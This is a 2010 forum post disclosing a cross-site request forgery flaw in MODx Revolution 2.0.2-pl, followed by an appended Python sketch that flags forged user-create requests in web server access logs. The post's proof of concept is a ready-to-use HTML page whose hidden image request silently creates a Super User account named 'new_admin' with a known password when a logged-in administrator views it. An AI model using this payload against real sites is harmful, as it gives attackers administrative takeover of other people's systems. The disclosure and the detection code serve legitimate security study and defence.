MODx Revolution 2.0.2-pl Cross-site Request Forgery
Software:- MODx Revolution 2.0.2-pl
Vulnerability:- Cross-site Request Forgery
Tested On:- Windows Vista + XAMPP
Date:- 9/28/2010
Description:-
A vulnerability in MODx Revolution 2.0.2-pl can be exploited to create a new admin.
Proof of Concept:-
- Code:
<html>
<body>
<img src="http://localhost/modx/connectors/security/user.php?action=create&modx-ab-stay=&groups=%5B%7B%22usergroup%22%3A%221%22%2C%22role%22%3A%222%22%2C%22member%22%3A%22%22%2C%22rolename%22%3A%22Super%20User%22%2C%22name%22%3A%22Administrator%22%2C%22menu%22%3Anull%7D%5D&extended=%7B%7D&HTTP_MODAUTH=modx4ca298fc3d92e9.21874888&id=0&newpassword=false&modx-user-fs-newpassword-checkbox=on&passwordnotifymethod=s&passwordgenmethod=spec&specifiedpassword=Password1&confirmpassword=Password1&username=new_admin&active=1&fullname=&email=x%40x.com&phone=&mobilephone=&address=&city=&fax=&state=&zip=&country=&website=&dob=&gender=&comment=&failedlogincount=&blockeduntil=&blockedafter=&extended_name=&extended_value=&extended_id=" />
</body>
</html>
andry- Moderator
- Posts : 467
Join date : 2010-05-07
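A detection sketch for the request pattern in the proof of concept above, added here as an example and not part of the original post: it scans access-log lines for GET requests to connectors/security/user.php with action=create whose Referer is missing or points to another host. The site host `cms.example.test`, the Apache combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

SITE_HOST = "cms.example.test"               # assumption: host the manager is served from
CONNECTOR = "/connectors/security/user.php"  # connector path taken from the PoC URL

# Apache "combined" format: ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample lines (not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [28/Sep/2010:10:01:02 +0000] "POST /modx/connectors/security/user.php HTTP/1.1" 200 64 "http://cms.example.test/modx/manager/" "Mozilla/5.0"
198.51.100.7 - - [28/Sep/2010:10:05:40 +0000] "GET /modx/connectors/security/user.php?action=create&username=new_admin&active=1 HTTP/1.1" 200 64 "http://forum.example.net/viewtopic?t=9" "Mozilla/5.0"
198.51.100.7 - - [28/Sep/2010:10:06:11 +0000] "GET /modx/connectors/security/user.php?action=getList&start=0 HTTP/1.1" 200 512 "http://cms.example.test/modx/manager/" "Mozilla/5.0"
198.51.100.9 - - [28/Sep/2010:10:09:30 +0000] "GET /modx/connectors/security/user.php?action=create&username=x HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

def find_forged_user_creates(log_text, site_host=SITE_HOST):
    """Return findings for GET user-create requests with a missing or off-site Referer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "GET":
            continue  # POST bodies are not in the access log, so only GET is inspected
        url = urlsplit(m["target"])
        params = parse_qs(url.query, keep_blank_values=True)
        if not url.path.endswith(CONNECTOR) or params.get("action") != ["create"]:
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None when the Referer is "-" or empty
        if ref_host != site_host:
            findings.append({
                "time": m["time"],
                "client": m["ip"],
                "username": params.get("username", [""])[0],
                "referer": m["referer"],
                "status": int(m["status"]),
            })
    return findings

if __name__ == "__main__":
    for finding in find_forged_user_creates(SAMPLE_LOG):
        print(finding)
```

Each finding names the account to look up in the user table. A same-site Referer is not proof that the request was intended, so the result is a triage list rather than a verdict.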